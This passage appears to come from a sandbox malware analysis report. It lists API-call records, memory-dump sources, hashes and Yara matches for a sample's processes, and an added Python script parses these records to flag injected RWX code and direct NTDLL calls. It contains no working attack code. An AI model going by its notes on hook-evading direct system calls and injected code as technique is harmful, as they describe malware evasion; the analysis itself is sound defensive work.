                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
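
The function records on this page (one "APIs / Memory Dump Source / Similarity" block each) are what an analyst reads to separate the code in process index 0, which calls KERNELBASE from an RWX region at 00C80000 that the report does not attribute to a PE image, from the Yara-matched code in process index 3 at 00400000 that calls NTDLL directly. The following Python script is an added example, not part of this report or of Joe Sandbox: it parses records in that layout and flags the two properties worth acting on, code in writable-executable memory not backed by a PE image and direct NTDLL calls. The .sdmp field layout it relies on (first dotted field = process index, fourth = region base, fifth = page protection) is an assumption drawn from the names shown in the report, and the sample text is constructed from three of the records on this page.

```python
"""Triage helper for the 'APIs / Memory Dump Source / Similarity' records in
this report.  Added example, not part of the report or of Joe Sandbox.  Assumed
.sdmp layout: field 1 = process index, field 4 = region base, field 5 = protection."""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40   # winnt.h

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+)\.sdmp,\s*Offset:\s*[0-9A-Fa-f]+,"
                    r"\s*based on PE:\s*(true|false)$")
FIELD_RE = re.compile(r"^•\s*(API ID|Opcode ID|Instruction ID):\s*(.*)$")

# Constructed sample: three records copied in the report's own layout.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8BE89,00000800,00000000,00000000), ref: 00C8C09A
Memory Dump Source
• Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
Similarity
• API ID: LibraryLoad
Uniqueness Score: -1.00%
APIs
• NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
Memory Dump Source
• Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
Similarity
• API ID: InitializeThunk
Uniqueness Score: -1.00%
"""


@dataclass
class FuncRecord:
    process: int = -1
    base: int = 0
    protection: int = 0
    based_on_pe: bool = False
    yara: bool = False
    apis: list = field(default_factory=list)    # (function, module, call-site address)
    fields: dict = field(default_factory=dict)  # API ID / Opcode ID / Instruction ID

    @property
    def rwx_unbacked(self) -> bool:
        # Writable+executable memory not attributed to a PE image: where unpacked or injected code lives.
        return self.protection == PAGE_EXECUTE_READWRITE and not self.based_on_pe

    @property
    def native_calls(self) -> list:
        # Direct NTDLL calls bypass the kernel32/kernelbase layer that most user-mode hooks watch.
        return [f for f, m, _ in self.apis if m.upper() == "NTDLL"]


def parse_records(text: str) -> list:
    """One FuncRecord per block; a 'Uniqueness Score' line ends a record."""
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Uniqueness Score"):
            records.append(cur)
            cur = FuncRecord()
        elif line == "Yara matches":
            cur.yara = True
        elif m := API_RE.match(line):
            cur.apis.append((m.group(1), m.group(2), int(m.group(4), 16)))
        elif m := SRC_RE.match(line):
            parts = m.group(1).split(".")
            cur.process, cur.base, cur.protection = (int(parts[0], 16), int(parts[3], 16), int(parts[4], 16))
            cur.based_on_pe = m.group(2) == "true"
        elif m := FIELD_RE.match(line):
            cur.fields[m.group(1)] = m.group(2)
    if cur.apis or cur.fields:              # trailing record without a terminator
        records.append(cur)
    return records


def summarize(records: list) -> dict:
    """Per process index: APIs seen, direct NTDLL calls, and whether any
    function ran from unbacked RWX memory or matched a Yara rule."""
    out = {}
    for r in records:
        s = out.setdefault(r.process, {"apis": set(), "native": set(),
                                       "rwx_unbacked": False, "yara": False})
        s["apis"].update(f for f, _, _ in r.apis)
        s["native"].update(r.native_calls)
        s["rwx_unbacked"] |= r.rwx_unbacked
        s["yara"] |= r.yara
    return out


if __name__ == "__main__":
    for pid, s in sorted(summarize(parse_records(SAMPLE)).items()):
        print(f"process {pid}: apis={sorted(s['apis'])} native={sorted(s['native'])} "
              f"rwx_unbacked={s['rwx_unbacked']} yara={s['yara']}")
```

Run against the full record list of a report, the per-process summary shows the hand-off at a glance: one process index with KERNELBASE loader calls from an unbacked RWX region, another with NtCreateFile/NtReadFile/NtAllocateVirtualMemory/NtClose and LdrLoadDll called straight into NTDLL. The "based on PE" flag and the protection field are the two values to check before trusting any function-level verdict, because a function whose bytes live in unbacked RWX memory has no on-disk counterpart to hash or sign.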

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                    • Instruction ID: 1c387b76600627650b6819d79891315938da2532beacdf6eba0751ca60b83255
                                                                    • Opcode Fuzzy Hash: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                    • Instruction Fuzzy Hash: 189002B124500406D1507199C404B465005A7D4341F51C021E5054558EC6998DD576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                    • Instruction ID: 066afbbaee80f1cf2a7b946c4befa58c81678e0e9740d18e04cc144136699620
                                                                    • Opcode Fuzzy Hash: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                    • Instruction Fuzzy Hash: 629002A138500446D1107199C414F065005E7E5341F51C025E1054558DC659CC527166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                    • Instruction ID: 2bd5919e88714193f29911616f0508cfeda5cdc7f670760f41842329c17a0e4f
                                                                    • Opcode Fuzzy Hash: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                    • Instruction Fuzzy Hash: 2F90027124500417D1217199C504B075009A7D4281F91C422E041455CDD6968952B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                    • Instruction ID: 508186fb2cfded73a4f089206a1b60fad9520664b0f2a3da021fb72835730888
                                                                    • Opcode Fuzzy Hash: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                    • Instruction Fuzzy Hash: 7C900261286041565555B199C4049079006B7E4281791C022E1404954CC5669856F661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                    • Instruction ID: a39710d3f77afb66d058e72b7e279df777655238508491215038944a314520d9
                                                                    • Opcode Fuzzy Hash: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                    • Instruction Fuzzy Hash: 2890026164500506D1117199C404A16500AA7D4281F91C032E1014559ECA658992B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                    • Instruction ID: dad9c040ba12159cd864e08e64d24f74c49e13ae3687ead8c07960c545250216
                                                                    • Opcode Fuzzy Hash: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                    • Instruction Fuzzy Hash: 8590026125580046D21075A9CC14F075005A7D4343F51C125E0144558CC95588617561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                    • Instruction ID: 8d3223bf904b67048c4cfa1214fe2532237efd25386b507f13105443f47b1234
                                                                    • Opcode Fuzzy Hash: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                    • Instruction Fuzzy Hash: E790026164500046415071A9C844D069005BBE5251751C131E0988554DC599886576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                    • Instruction ID: 55859acc61968ad77d4a2c93a8a82a82b72851bca6ec76ea3b2ca8c055457d3f
                                                                    • Opcode Fuzzy Hash: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                    • Instruction Fuzzy Hash: 4790027124540406D1107199C814B0B5005A7D4342F51C021E1154559DC665885175B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                    • Instruction ID: 9966db121b8c030af6e55580ff80fe879c88bedfab1e472fb111a3138541315a
                                                                    • Opcode Fuzzy Hash: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                    • Instruction Fuzzy Hash: D7900265255000070115B59987049075046A7D9391351C031F1005554CD66188617161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                    • Instruction ID: a49e9a3960065345fe8eebc9d0bcc5a5b5d6dcef72872ca5e1127532284be3d9
                                                                    • Opcode Fuzzy Hash: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                    • Instruction Fuzzy Hash: F39002A12460000741157199C414A16900AA7E4241B51C031E1004594DC56588917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                    • Instruction ID: 3210e63192e8992dd1d9479d9318080ee6c4f7c6eb89c431d15d69dc8fdca38c
                                                                    • Opcode Fuzzy Hash: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                    • Instruction Fuzzy Hash: 1B90027124500406D11075D9D408A465005A7E4341F51D021E5014559EC6A588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                    • Instruction ID: b582540a66b8fdeac5070419f4576c3f3b0365fd6d4e97d9eb18b06db570bdc8
                                                                    • Opcode Fuzzy Hash: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                    • Instruction Fuzzy Hash: 9B90027135514406D1207199C404B065005A7D5241F51C421E081455CDC6D588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                    • Instruction ID: 1d739e7e298b658a640c93891525d04a303ed4e11e5cf1b761082110ba3ec658
                                                                    • Opcode Fuzzy Hash: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                    • Instruction Fuzzy Hash: 6990026134500007D1507199D418A069005F7E5341F51D021E0404558CD95588567262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                    • Instruction ID: d651c38ec4f6cb1c583086468c07a05bd5d8e36020711aa54685a06f9797c3a6
                                                                    • Opcode Fuzzy Hash: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                    • Instruction Fuzzy Hash: 9790026925700006D1907199D408A0A5005A7D5242F91D425E000555CCC95588697361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                    • Instruction ID: 35da7bba118a46eab94dddfe866e31208d7a045f1d8f16806097141380d41ec2
                                                                    • Opcode Fuzzy Hash: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                    • Instruction Fuzzy Hash: 2A90027124500806D1907199C404A4A5005A7D5341F91C025E0015658DCA558A5977E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                    • Instruction ID: 5fc2c1157e5e3468d3fcd5ea2616ea22a04fd49ff419266a686798a928020df1
                                                                    • Opcode Fuzzy Hash: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                    • Instruction Fuzzy Hash: F890027124508806D1207199C404B4A5005A7D4341F55C421E441465CDC6D588917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                    • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                    • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                    • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 3333
                                                                    • API String ID: 1836367815-2924271548
                                                                    • Opcode ID: 8df30e0fd6041824e6e0a0fe0a02ca72f2d876522b7c0239830edda3765c1955
                                                                    • Instruction ID: 0aeaff593dfd710ad47aa5329f12881aa18fdf2f6c807c81e318b1fc18521893
                                                                    • Opcode Fuzzy Hash: 8df30e0fd6041824e6e0a0fe0a02ca72f2d876522b7c0239830edda3765c1955
                                                                    • Instruction Fuzzy Hash: 5E110A31B442147BDB20A695DC42FFE376C5B01B64F14446EFA04FB2C1D668AD0142EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                    • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                    • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                    • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 0e9544c33a6aa06f0dc466b5a8b38a4077844c5d2da60abf6bd6129510403572
                                                                    • Instruction ID: a6dff3bbc9822969be49a7d41e02aa08f90bbb9b3a04c31e652e8ee984644f1b
                                                                    • Opcode Fuzzy Hash: 0e9544c33a6aa06f0dc466b5a8b38a4077844c5d2da60abf6bd6129510403572
                                                                    • Instruction Fuzzy Hash: A7F020312003487AD720EB688C88EE77BADDF89740F00C1ADF9A92B242C935E90187F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: bc3e293d34da4c6a8a3200352f5f1f8ebf8de40a28ec3b926d6e44eca1862c8c
                                                                    • Instruction ID: 1cf8fd39b7fcaf75c1d1313f0906113975813a903783c27d0244b3c8946e43cf
                                                                    • Opcode Fuzzy Hash: bc3e293d34da4c6a8a3200352f5f1f8ebf8de40a28ec3b926d6e44eca1862c8c
                                                                    • Instruction Fuzzy Hash: D5F0A9B1200204AFCB10DF48DC81FE73769EF89240F108118FA089B381CA30A822CBE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: dd8b8a557460d852979bae4835e06237597004c062e4f83ec1cc7eb28e932e7e
                                                                    • Instruction ID: 2cf1158614a209b71be80f91dfb57c1e7371c6485e89acfdb94b89563314a81a
                                                                    • Opcode Fuzzy Hash: dd8b8a557460d852979bae4835e06237597004c062e4f83ec1cc7eb28e932e7e
                                                                    • Instruction Fuzzy Hash: D6E01AB5600214ABDB14DF55DC45EE77769AF88760F014599FE086B381CA30ED10CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
